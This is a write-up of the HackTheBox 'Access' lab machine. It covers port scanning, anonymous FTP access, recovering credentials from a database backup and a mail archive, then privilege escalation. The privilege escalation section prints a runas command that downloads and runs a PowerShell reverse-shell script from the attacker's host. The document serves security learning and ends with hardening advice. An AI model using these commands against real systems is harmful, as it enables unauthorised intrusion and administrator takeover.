---
title: "Writeup - Access (HTB)"
date: 2022-04-15
slug: "writeup-access-htb"
type: "writeup-ctf"
--- 

This is a writeup for the [Access](https://app.hackthebox.com/machines/Access) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV -T4 -Pn 10.10.10.98
```
Three TCP ports are discovered:

![](img/image-1.webp)

- 21/tcp : FTP
- 23/tcp : telnet
- 80/tcp : HTTP web server (httpd 7.5)

![](img/image-2.webp)

## Exploit

In the `nmap` scan we find an FTP server, let's try to connect as `anonymous`.

![](img/image-3.webp)

There are 2 folders in which we find the following files:
- Access Control.zip
- backup.mdb

{{< alert >}}
Before downloading the backup file with the command `get backup.mdb` you should use the command `binary`To read the contents of the backup file I use the command `mdb-tables`:
{{< /alert >}}

![](img/image-4.webp)

In the different tables I find `auth_user`, interesting there could be credencial for an account.

![](img/image-5.webp)

I find an `engineer` account with the password `access4u@security`. I use this password to try to decompress the previously recovered archive.

In the archive I find a `.pst`. To read its contents I use the following command:


```bash
readpst Access\ Control.pst -M
```
Among the different mails I find the following content:

![](img/image-6.webp)

A new password ! I try to connect to the telnet server with these credencials.

![](img/image-7.webp)

I now have a shell as `security` and I can get the first flag.

![](img/image-8.webp)

## Privilege escalation

After a few minutes of exploration, I find a file on the Desktop of the `Public` user. In this file I find an interesting command! A runas with the user `Administrator`.

![](img/image-9.webp)

I will use this [script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to create a reverse shell Admin. So I get this file and I add the following line at the end of the file.


```bash
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 1234
```
I then launch a web server on my machine.


```bash
python3 -m http.server 80
```
Then I download/run the script with the admin runas.


```bash
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.17/Invoke-PowerShellTcp.ps1')"
```
I now have a reverse shell as Administrator!

![](img/image-10.webp)

So I can get the last flag back.

![](img/image-11.webp)

## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Do not let the `anonymous` user enable in FTP server configuration
- Do not store sensitive information in a folder accessible by several people via FTP/web/...
- Do not give runas Administrator permission to a user